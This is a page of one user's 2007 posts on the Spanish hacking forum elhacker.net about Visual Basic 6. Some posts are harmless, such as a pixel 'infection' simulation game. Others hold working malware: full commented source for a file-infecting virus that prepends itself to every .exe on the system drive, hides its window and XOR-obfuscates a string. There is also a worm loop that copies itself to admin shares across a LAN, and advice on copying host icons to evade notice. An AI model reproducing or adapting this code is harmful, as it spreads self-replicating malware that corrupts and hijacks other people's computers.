elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 ... 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 [86] 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102
851  Programación / Programación Visual Basic / Re: [Source] Pixel Infection en: 8 Abril 2007, 00:39 am
Me alegro de que os guste... lo que no entiendo es porque mis bichitos se agrupan arriba del todo!! tengo un error en el código y no sé encontrarlo.

Help me  :¬¬
852  Programación / Programación Visual Basic / Re: Como obtener datos de una web desde vb? en: 7 Abril 2007, 23:56 pm
Es facil, pero dinos antes para que lo vas a usar...

Si lo quieres para visitar una web del tipo "cualesmiip" o "showmyip", etc... lo unico que tienes que hacer es:

Citar
1) winsock.connect url,80
2) buscar un patrón que te situe delante de la IP, en el código fuente
3) con las funciones InStr y Mid sacas la IP

El código te dejo que lo pienses tú, además creo recordar que hay algo ya programado en este foro usando la web de no-ip.com para ver la IP pública

Suerte ;)
853  Programación / Programación Visual Basic / [Source] Pixel Infection en: 7 Abril 2007, 23:47 pm
Buenas!!

En una de mis rayadas de fin de semana me ha dado por programarme un "mundo virtual" de seres pixelados, os dejo una foto del programa:



Hay 3 clases de píxeles:
  • Humanos
  • Virus
  • Doctores

Todos los bichitos se mueven aleatoriamente por la pantalla, cumpliendo unas normas básicas, estas son:

Citar
1) Si un Virus toca un Humano, el Humano se convertirá en Virus (50% de las veces).
2) So un Virus toca un Doctor, el Doctor se convertirá en Virus (30% de las veces)
3) Si un Doctor toca un Virus, el Virus se curará:
     El 70% de las veces se convertirá en Humano
     El 30% de las veces se convertirá en Doctor

Las reglas son sencillas, y como todo está programado bajo Randomize... a veces ganan los virus y otras veces los Humanos, pero tengo un problema, a ver si entre unos cuantos lo mejoramos...

1) Si dejamos un buen rato los bichitos enchufados, éstos terminan agrupándose en la parte superior izquierda (hay que solucionarlo)
2) Molaría añadir una raza nueva, por ejemplo Mujeres que ayudaran a reproducir más humanos
3) Molaría cambiar las leyes y poner, por ejemplo, hombres lobo y vampiros, etc...
4) Estaría bien añadir sonidos cuando infecten o desinfecten bichos, con la API Beep.

A parte el modo en el que está programado consume bastantes recursos, sería bueno mejorar este punto...



Dejo el código como curiosidad, no es muy útil pero a mi me divierten este tipo de cosas. Si conseguis mejorar algo o añadir cosas ponerlo en este post, el source esta comentado al máximo, si no se entiende algo me lo preguntais, pero creo que es facil de entender.

PD: La idea de este programa no es mía, ví un código similar en pscode, yo me he quedado con la idea y he hecho mejoras (como la raza de los médicos por ejemplo). Saludos!!

 :xD
854  Programación / Programación Visual Basic / Re: puedo hacer algo con la red lan? en: 7 Abril 2007, 14:16 pm
Es facil, te explico lo que yo haría...

1) Hacer que el virus recoja info del PC: IP local y Mascara de subred (por ejemplo haciendo un ipconfig /all y depurando la salida).

2) Calcular cuantos equipos hay en la lan a partir de la máscara de subred, por ejemplo:

Citar
Direccion: 192.168.10.58
Mascara: 255.255.255.0

Con estos datos sabrás que hay IP's comprendidas entre: 192.168.10.1 hasta 192.168.10.254

3) Empezar un bucle bestial de este tipo:

Código:
    For i = 1 To 255
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\C$"     'C:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\D$"     'D:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\E$"     'E:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\F$"     'F:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\G$"     'G:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\ADMIN$" 'C:\Windows
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\PRINT$" 'C:\WINDOWS\system32\spool\drivers
    Next i

4) Ahora te lo puedes currar y editar los archivos de inicio de forma remota (copiando archivos en la carpeta inicio, modificando win.ini, etc...)

No hay que decir que necesitas permisos administrativos en la lan para poder hacer esto :P

5) Y para rizar el rizo, tendrías que encontrar el comando que te permite ver los recursos que comparte un equipo, te doy una pista...

Citar
net view [\\nombre_pc] te da todos sus recursos xD

Saludos!! y no seas malo haciendo lanworm's :xD
855  Programación / Programación Visual Basic / Re: For con números, muy bonito, pero con letras?? en: 5 Abril 2007, 21:52 pm
Lo que quieres hacer es un generador de fuerza bruta, que genere todas las combinaciones desde "aaaaaaa" hasta "zzzzzzzz". Te dejo 3 engines de fuerza bruta, hay uno de ellos que es rapidisimo y muy bueno, muestra los password por segundo que genera. Los códigos no son míos.

PD: Usa un bucle for dentro de otro, dentro de otro for, dentro de otro for... no te servirá, mirate estos engines

Saludos!!
856  Programación / Programación Visual Basic / Re: [Source] Explorador de carpetas remoto (File Manager) en: 5 Abril 2007, 18:26 pm
Muy útil E0N, a seguir asi :)
857  Programación / Programación Visual Basic / Re: [Source] Infección de ejecutables en VB6 en: 5 Abril 2007, 07:03 am
En mi máquina virtual el virus no consume tantos recursos, pero eso es tan facil como poner un sleep cada 100 archivos y solucionado.

El tema de los parametros ya era consciente, se puede solucionar de forma sencilla con una función más que recoja los parametros y se los envíe a la aplicación infectada

Para terminar, los archivos de system32 (cmd, taskkill, tasklist, etc...) tiene habilitado el SFC de Windows (Sistema de Protección de Archivos), si un virus o similar modifica, sobreescribe o elimina un ejecutable, esté se creará de nuevo pasado unos segundos. Es por eso que no se puede infectar el cmd, explorer, tasklist, etc...

Saludos!!
858  Programación / Programación Visual Basic / Re: [Source] Infección de ejecutables en VB6 en: 4 Abril 2007, 23:24 pm
ya que de tu manera, el icono siempre sera el de TU programa, es decir, el del VB, esto canta mucho, si alguien se mete a buscar algo en su HD y se encuentra con los ejecutables todos con el mismo icono del VB...XDDD
Exacto, pero eso tiene facil solución... antes de infectar el archivo hay que leer su icono y escribirlo a nuestro código vírico, en mis pruebas con una máquina virtual funciona de maravilla, solo tienes que añadir el módulo de IconChanger.bas que ya postee aqui.

Saludos!!

PD: esto no estaba ya explicado por WarGhost en un papper??? :-\ :-\

Mi código es del 29 Junio 2006, desconozco si WarGhost lo hizo antes o después.

Saludos!!
859  Programación / Programación Visual Basic / Re: [Source] Infección de ejecutables en VB6 en: 4 Abril 2007, 23:05 pm
Esté código lo programé enterito para el Laboratorio del foro, pedí si podía sacar el código fuera y aquí lo teneis, de pueden mejorar algunas cosillas, vosotros mismos...

Saludos!!
860  Programación / Programación Visual Basic / [Source] Infección de ejecutables en VB6 en: 4 Abril 2007, 23:02 pm
Infección de Ejecutables en Visual Basic 6.0

Bueno, ya he finalizado el proyecto, lo he testeado en una máquina virtual y funciona a la perfección :P Os dejo el código comentado, tambien os dejo una versión compilada del proyecto y un ZIP con el source :)

Como funciona?

1- El programa principal busca por el disco duro todos los archivos con extension *.exe
2- Cuando encuentra uno, crea una copia del virus con el siguiente formato: [VIRUS]+Marca+[HUESPED]
3- Cuando se ejecuta un archivo infectado, el virus busca la Marca para separar el [VIRUS] del [HUESPED] y ejecutarlos de forma separada



Form1.frm
Código
  1. Private Sub Form_Load()
  2.    App.TaskVisible = False
  3.    If App.PrevInstance = True Then End
  4.    SelfCheck
  5. End Sub
  6.  

InfectModule.bas
Código
  1.  
  2. Function SelfCheck()
  3.    On Error Resume Next
  4.    Dim MyCode As String
  5.  
  6.    'Se abre a si mismo, lee su codigo y lo guarda en "MyCode"
  7.    Open App.path & "\" & App.EXEName & ".exe" For Binary As #1
  8.        MyCode = Input(LOF(1), 1)
  9.    Close #1
  10.  
  11.    'Separa "MyCode" buscando la marca de infección (**X**)
  12.    Buffer = Split(MyCode, "(**X**)")
  13.  
  14.    If UBound(Buffer) = 1 Then
  15.        'Si existe la marca: Llama la funcion "DivideFiles" con el argumento del código del Huésped
  16.        Hostage = Buffer(1)
  17.        DivideFiles Hostage
  18.    Else
  19.        'Si NO existe la marca: Llama la funcion "Subfolders" con el argumento de unidad del Sistema (C:\)
  20.        Subfolders (Environ("SystemDrive") & "\")
  21.        DoEvents
  22.        End
  23.    End If
  24. End Function
  25.  
  26. Function DivideFiles(ByVal Hostage As String)
  27.    Randomize
  28.    On Error Resume Next
  29.    Dim TmpFile As String
  30.  
  31.    'Crea un archivo temporal con el código del Huésped, por ejemplo:
  32.    'C:\DOCUME~1\USER\CONFIG~1\Temp\85061.exe
  33.    TmpFile = Environ("TMP") & "\" & Int((Rnd * 99999) + 1) & ".exe"
  34.  
  35.    Open TmpFile For Binary As #1
  36.        Put #1, , Hostage
  37.    Close #1
  38.  
  39.    DoEvents
  40.    'Ejecuta el archivo temporal (el Huésped) y llama al "PayLoad" del virus
  41.    Shell TmpFile, vbNormalFocus
  42.    Call ExecPayload
  43. End Function
  44.  
  45. Function InfectFile(ByVal Victim As String)
  46.    On Error Resume Next
  47.    Dim VictimCode As String
  48.    Dim NewCode As String
  49.    Dim MyCode As String
  50.  
  51.    'Se abre a si mismo, lee su codigo y lo guarda en "MyCode"
  52.    Open App.path & "\" & App.EXEName & ".exe" For Binary As #1
  53.        MyCode = Input(LOF(1), 1)
  54.    Close #1
  55.  
  56.    'Abre el archivo Huésped, lee su código y lo guarda en "VictimCode"
  57.    Open Victim For Binary As #1
  58.        VictimCode = Input(LOF(1), 1)
  59.    Close #1
  60.  
  61.    'Crea la variable "NewCode" donde se guarda: MyCode + (**X**) + VictimCode
  62.    NewCode = MyCode & "(**X**)" & VictimCode
  63.  
  64.    'Sobrescribe el archivo Huésed con el infectado
  65.    Open Victim For Binary As #1
  66.        Put #1, , NewCode
  67.    Close #1
  68. End Function
  69.  
  70. Function IsInfected(ByVal File As String) As Boolean
  71.    On Error Resume Next
  72.    Dim FileCode As String
  73.  
  74.    'Abre el archivo "File", lee su codigo y lo guarda en "FileCode"
  75.    Open File For Binary As #1
  76.        FileCode = Input(LOF(1), 1)
  77.    Close #1
  78.  
  79.    'Separa "FileCode" buscando la marca de infección (**X**)
  80.    Buffer = Split(FileCode, "(**X**)")
  81.  
  82.    'Devuleve "True" o "False" si ha encontrado la marca (**X**)
  83.    If UBound(Buffer) <> 0 Then
  84.        IsInfected = True
  85.    Else
  86.        IsInfected = False
  87.    End If
  88. End Function
  89.  
  90. Function Subfolders(path)
  91.    On Error Resume Next
  92.    'Se cifra el string que carga el objeto Scripting.FileSystemObject
  93.    Set fso = CreateObject(bullet("Qapkrvkle,DkngQ{qvgoM`hgav"))
  94.    Set Drives = fso.Drives
  95.  
  96.    newpath = path
  97.    Set Fold = fso.GetFolder(newpath)
  98.    Set Files = Fold.Files
  99.  
  100.    For Each File In Files
  101.        ext = fso.GetExtensionName(File.path)
  102.        ext = LCase(ext)
  103.        nam = LCase(File.Name)
  104.        If (ext = "exe") Then
  105.            If IsInfected(File.path) = False Then
  106.                InfectFile (File.path)
  107.                DoEvents
  108.            End If
  109.        End If
  110.    Next
  111.  
  112.    Set File = Fold.Subfolders
  113.    For Each Subfol In File
  114.        Call Subfolders(Subfol.path)
  115.    Next
  116. End Function
  117.  
  118. Function ExecPayload()
  119.    '#######################################################
  120.    '##  Si quieres que los archivos infectados ejecuten  ##
  121.    '##  la función de buscar e infectar nuevos archivos  ##
  122.    '##  elimina los comentario que hay a continuación    ##
  123.    '#######################################################
  124.  
  125.    'Subfolders (Environ("SystemDrive") & "\")
  126.    'DoEvents
  127.  
  128.    MsgBox "Aqui empieza el código del PayLoad, añade las funciones que desees, como por ejemplo un webdownloader o un irc_bot"
  129.    End
  130. End Function
  131.  

Encryption.bas
Código
  1. Function bullet(FullCode)
  2.    'Funcion que cifra Strings con el operador XOR
  3.  
  4.    For i = 1 To Len(FullCode)
  5.        Current = Mid(FullCode, i, 1)
  6.        Code = Chr(Asc(Current) Xor 2)
  7.        bullet = bullet + Code
  8.    Next
  9. End Function
  10.  



Adjunto el código fuente del proyecto. OJO no el código compilado en vuestra maquina, porque infectaria vuestros archivos xD

Ir con cuidado, Saludos!!
Páginas: 1 ... 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 [86] 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines